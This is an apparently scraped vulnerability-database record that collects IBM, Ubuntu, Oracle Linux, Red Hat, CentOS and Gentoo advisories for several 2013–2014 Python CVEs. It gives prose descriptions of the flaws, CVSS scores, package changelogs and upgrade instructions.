\nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96193_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96193>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2013-1753_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1753>)** \nDESCRIPTION:** Python is vulnerable to a denial of service, caused by the failure to restrict the size of a gzip compressed HTTP responses by the xmlrpc library. By connecting to a malicious server, an attacker could exploit this vulnerability to consume an overly large amount of memory resources. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111150_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111150>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L)\n\n**CVEID:** [_CVE-2014-4616_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616>)** \nDESCRIPTION:** Python JSON module could allow a local attacker to obtain sensitive information, caused by the failure to properly handle negative index values and allowing them to be used directly as an index to an array in the C code. An attacker could exploit this vulnerability to read current process memory and obtain sensitive information. \nCVSS Base Score: 2.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/93933_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93933>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:N/A:N)\n\n**CVEID:** [_CVE-2014-4650_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4650>)** \nDESCRIPTION:** Python CGIHTTPServer module could allow a remote attacker to obtain sensitive information, caused by the failure to properly handle URL-encoded path separators in URLs. 
An attacker could exploit this vulnerability to obtain the source code of CGI scripts. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/93932_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93932>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n## Affected Products and Versions\n\nPowerKVM 2.1 and PowerKVM 3.1\n\n## Remediation/Fixes\n\nCustomers can update PowerKVM systems by using \"yum update\". \n \nFix images are made available via Fix Central. For version 3.1, see [_https://ibm.biz/BdHggw_](<https://ibm.biz/BdHggw>) for 3.1.0 service pack 1 (SP1) or later. \n \nFor version 2.1, the fix is made available via Fix Central ([_https://ibm.biz/BdEnT8_](<https://ibm.biz/BdEnT8>)) in 2.1.1 Build 65.7 and all later 2.1.1 SP3 service builds and 2.1.1 service packs. Customers running v2.1 are, in any case, encouraged to upgrade to v3.1. \n \nFor v2.1 systems currently running fix levels of PowerKVM prior to 2.1.1, please see <http://download4.boulder.ibm.com/sar/CMA/OSA/05e4c/0/README> for prerequisite fixes and instructions.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product 
Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n4 March 2016 - Initial Version\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSZJY4\",\"label\":\"PowerKVM\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1;3.1\",\"Edition\":\"KVM\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-06-18T01:30:44", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Python affect PowerKVM", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2018-06-18T01:30:44", "id": "A8F9E1B81DC06E155AA3018909D00AA443F0B83C885BE667CD9EB051536E7A27", "href": "https://www.ibm.com/support/pages/node/628405", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:56", "description": "_json information leak, CGIHTTPServer unauthorized file access and code execution, lz4 integer overflow.", "edition": 1, "cvss3": {}, "published": "2014-07-14T00:00:00", "title": "python security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-07-14T00:00:00", "id": "SECURITYVULNS:VULN:13867", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13867", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "ubuntu": [{"lastseen": "2022-01-04T12:39:01", "description": "It was discovered that multiple Python protocol libraries incorrectly \nlimited certain data when connecting to servers. A malicious ftp, http, \nimap, nntp, pop or smtp server could use this issue to cause a denial of \nservice. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking \ngzip-compressed HTTP bodies. A malicious server could use this issue to \ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain \nargument. 
An attacker could possibly use this issue to read arbitrary \nmemory and expose sensitive information. This issue only affected Ubuntu \n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled \nURL-encoded path separators in URLs. A remote attacker could use this issue \nto expose sensitive information, or possibly execute arbitrary code. This \nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in \nbuffer functions. An attacker could possibly use this issue to read \narbitrary memory and obtain sensitive information. This issue only affected \nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-25T00:00:00", "type": "ubuntu", "title": "Python vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616", "CVE-2014-4650", "CVE-2013-1752", "CVE-2013-1753", "CVE-2014-7185"], "modified": "2015-06-25T00:00:00", "id": "USN-2653-1", "href": 
"https://ubuntu.com/security/notices/USN-2653-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2021-06-04T20:20:34", "description": "[2.7.5-34.0.1]\n- Add Oracle Linux distribution in platform.py [orabug 20812544]\n[2.7.5-34]\n- Revert fix for rhbz#1117751 as it leads to regressions\nResolves: rhbz#1117751\n[2.7.5-33]\n- Only restore SIG_PIPE when Popen called with restore_sigpipe\nResolves: rhbz#1117751\n[2.7.5-32]\n- Backport SSLSocket.version function\n- Temporary disable test_gdb on ppc64le rhbz#1260558\nResolves: rhbz#1259421\n[2.7.5-31]\n- Update load_cert_chain function to accept None keyfile\nResolves: rhbz#1250611\n[2.7.5-30]\n- Change Patch224 according to latest update in PEP493\nResolves:rhbz#1219108\n[2.7.5-29]\n- Popen shouldn't ignore SIG_PIPE\nResolves: rhbz#1117751\n[2.7.5-28]\n- Exclude python subprocess temp files from cleaning\nResolves: rhbz#1058482\n[2.7.5-27]\n- Add list for cprofile sort option\nResolves:rhbz#1237107\n[2.7.5-26]\n- Add switch to toggle cert verification on or off globally\nResolves:rhbz#1219108\n[2.7.5-25]\n- PEP476 enable cert verifications by default\nResolves:rhbz#1219110\n[2.7.5-24]\n- Massive backport of ssl module from python3 aka PEP466\nResolves: rhbz#1111461\n[2.7.5-23]\n- Fixed CVE-2013-1753, CVE-2013-1752, CVE-2014-4616, CVE-2014-4650, CVE-2014-7185\nResolves: rhbz#1206574\n[2.7.5-22]\n- Fix importing readline producing erroneous output\nResolves: rhbz#1189301\n[2.7.5-21]\n- Add missing import in bdist_rpm\nResolves: rhbz#1177613\n[2.7.5-20]\n- Avoid double close of subprocess pipes\nResolves: rhbz#1103452\n[2.7.5-19]\n- make multiprocessing ignore EINTR\nResolves: rhbz#1181624", "cvss3": {}, "published": "2015-11-23T00:00:00", "type": "oraclelinux", "title": "python security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": 
"2015-11-23T00:00:00", "id": "ELSA-2015-2101", "href": "http://linux.oracle.com/errata/ELSA-2015-2101.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-04T20:20:39", "description": "python27\n[1.1-17]\n- Require python-pip and python-wheel (note: in rh-python34\n this is not necessary, because 'python' depends on these).\npython27-python\n[2.7.8-3]\n- Add httplib fix for CVE-2013-1752\nResolves: rhbz#1187779\n[2.7.8-2]\n- Fix %check\nunset DISPLAY\n section not failing properly on failed test\n- Fixed CVE-2013-1752, CVE-2013-1753\nResolves: rhbz#1187779\n[2.7.8-1]\n- Update to 2.7.8.\nResolves: rhbz#1167912\n- Make python-devel depend on scl-utils-build.\nResolves: rhbz#1170993\npython27-python-pip\n - New Package added\npython27-python-setuptools\n[0.9.8-3]\n- Enhance patch restoring proxy support in SSL connections\nResolves: rhbz#1222507\npython27-python-simplejson\n[3.2.0-2]\n- Fix CVE-2014-4616, add boundary checks\nResolves: rhbz#1222534\npython27-python-wheel\n - New Package added ", "cvss3": {}, "published": "2016-02-04T00:00:00", "type": "oraclelinux", "title": "python27 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2016-02-04T00:00:00", "id": "ELSA-2015-1064", "href": "http://linux.oracle.com/errata/ELSA-2015-1064.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2021-10-21T04:46:00", "description": "Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. 
Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. 
(CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. 
(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-11-19T13:41:01", "type": "redhat", "title": "(RHSA-2015:2101) Moderate: python security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2018-04-11T23:32:44", "id": "RHSA-2015:2101", "href": "https://access.redhat.com/errata/RHSA-2015:2101", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-19T20:37:25", "description": "Python is an interpreted, interactive, object-oriented programming language\nthat supports modules, classes, exceptions, high-level dynamic data types,\nand dynamic typing. 
The python27 collection provides a stable release of\nPython 2.7 with a number of additional utilities and database connectors\nfor MySQL and PostgreSQL.\n\nThe python27-python packages have been upgraded to upstream version 2.7.8,\nwhich provides numerous bug fixes over the previous version. (BZ#1167912)\n\nThe following security issues were fixed in the python27-python component:\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThe following security issue was fixed in the python27-python and\npython27-python-simplejson components:\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). 
An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nIn addition, this update adds the following enhancement:\n\n* The python27 Software Collection now includes the python-wheel and\npython-pip modules. (BZ#994189, BZ#1167902)\n\nAll python27 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. All running python27\ninstances must be restarted for this update to take effect.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-06-04T00:00:00", "type": "redhat", "title": "(RHSA-2015:1064) Moderate: python27 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "modified": "2018-06-12T21:28:19", "id": "RHSA-2015:1064", "href": "https://access.redhat.com/errata/RHSA-2015:1064", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2022-02-27T16:06:36", 
"description": "**CentOS Errata and Security Advisory** CESA-2015:2101\n\n\nPython is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. 
(CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. 
(BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-cr-announce/2015-November/015450.html\n\n**Affected packages:**\npython\npython-debug\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:2101", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2015-11-30T19:48:49", "type": "centos", "title": "python, tkinter security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2015-11-30T19:48:49", "id": "CESA-2015:2101", "href": "https://lists.centos.org/pipermail/centos-cr-announce/2015-November/015450.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:07:06", "description": "### Background\n\nPython is an interpreted, interactive, 
object-oriented programming language. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker may be able to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Python 3.3 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-3.3.5-r1\"\n \n\nAll Python 2.7 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/python-2.7.9-r1\"", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2015-03-18T00:00:00", "type": "gentoo", "title": "Python: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1752", "CVE-2013-7338", "CVE-2014-1912", "CVE-2014-2667", "CVE-2014-4616", "CVE-2014-7185", "CVE-2014-9365"], "modified": "2015-06-17T00:00:00", "id": "GLSA-201503-10", "href": "https://security.gentoo.org/glsa/201503-10", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}